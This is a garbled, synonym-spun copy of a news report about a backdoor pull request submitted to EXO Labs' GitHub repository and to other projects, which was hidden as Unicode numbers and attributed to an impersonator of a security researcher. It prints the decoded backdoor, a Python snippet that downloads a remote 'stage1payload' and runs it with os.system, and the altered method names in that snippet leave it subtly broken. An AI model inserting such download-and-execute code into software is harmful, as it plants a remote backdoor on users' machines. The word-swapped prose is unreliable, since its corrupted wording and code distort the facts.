GitHub initiatives have been focused with malicious commits and pull requests, in an try to inject backdoors into these initiatives.
Most just lately, the GitHub repository of Exo Labs, an AI and machine studying startup, was focused within the assault, which has left many questioning in regards to the attacker’s true intentions.
‘Harmless wanting PR’ caught injecting backdoor
On Tuesday, Alex Cheema, co-founder of EXO Labs warned everybody of an “innocent looking” code change submitted to EXO’s GitHub repository.
The pull request titled “clarify mlx requirement for deepseek models” tried to change the fashions.py Python file within the Exo’s code base by including a sequence of numbers to it:
Backdoor try on @exolabs by way of an harmless wanting PR.
Learn each line of code. Keep safu. pic.twitter.com/M0WHoCF5Mu
— Alex Cheema – e/acc (@alexocheema) November 12, 2024
These are Unicode numbers, every representing a personality. In different phrases, the plaintext Python code has been transformed to its numbers-equivalent type by way of a easy approach employed by the consumer submitting the code change.
This sequence of characters, “105, 109, 112, 111, 114, 116,…” interprets into the next code snippet (URL defanged for security functions):
import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.learn()
z = y.decode("utf8")
x.shut()
os.system(z)
The reasonably unsophisticated piece of code makes an attempt to connect with evildojo(.)com and, because it seems, obtain “stage1” payload.
Had the code change been authorized and merged into EXO’s official repository, which it didn’t, anybody utilizing the product may find yourself executing code being remotely served by the URL on their system—and therefore a useful backdoor implanted.
When accessed by BleepingComputer, nonetheless, the hyperlink returned a 404 (Not Discovered), and in accordance with a number of others who tried to entry the URL, no content material ever existed on the location from the start.
Who’s behind it and why?
That is the place it will get difficult and there is not any conclusive reply in sight.
The commit seems to have been submitted from a GitHub consumer, “evildojo666,” an account that has since been deleted.
The archived web page for the GitHub username and the area evildojo(.)com level to Mike Bell, a Texas-based safety researcher, moral hacker, and software program engineer who has persistently denied that he had something to do with these commits.
Bell claims somebody is impersonating him, making these malicious code submissions to smear him.
Bell has additional said that “there was never any payload…why do people keep assuming there was?”
In all equity, Bell’s story provides up. Anybody can trivially create a GitHub account utilizing one other individual’s particulars and profile image, and start submitting code modifications and pull requests to initiatives — all below the guise of one other individual.
The non-existent “stage1payload” web page on evildojo’s area is one other indicator that, for the reason that area by no means served any malicious code within the first place, that is more likely to be a smear marketing campaign towards the proprietor of the area, Mike Bell.
One other now-deleted GitHub account “darkimage666” was recognized by Malcoreio, a malware evaluation and reverse engineering platform. This account additionally impersonated Bell and appeared to have interaction on this malicious effort to distribute backdoor commits to open supply initiatives.
“Not me, an impersonator. Notice account deleted. Very sorry people are being dragged into some skid’s beef w/ me,” remarked Bell on the imposter account.
A number of initiatives focused
Social media customers, together with ChrzanKong, famous that another initiatives had been focused by totally different GitHub consumer accounts with related commits.
In accordance with risk intel analyst vx-underground, “yt-dlp,” a well-liked open supply audio and video downloader was additionally focused. Malcore recognized at the very least 18 cases of equivalent pull requests directed at different initiatives.
On the time of writing, BleepingComputer noticed that many such malicious commits and the related “muppet” GitHub consumer accounts, a few of which look like Indonesia-based, have been taken down.
Google engineer and tech occasions lead, Bogdan Stanga was in a position to recreate the pull request to check Presubmit’s AI Reviewer, which makes use of GitHub Actions to carry out immediate code critiques towards incoming pull requests to your repository. The take a look at code change was instantly flagged with a “critical security” alert by the reviewer:
(BleepingComputer)
The incident, though caught and squashed early on, has echoes of the notable xz provide chain assault which just lately demonstrated how malicious code might be snuck into authentic and broadly standard open supply libraries by nefarious actors.
Open supply undertaking maintainers are urged to rigorously scrutinize incoming pull requests, by way of automated instruments and intensive human code critiques, even when these look like originating from “good faith” contributors.
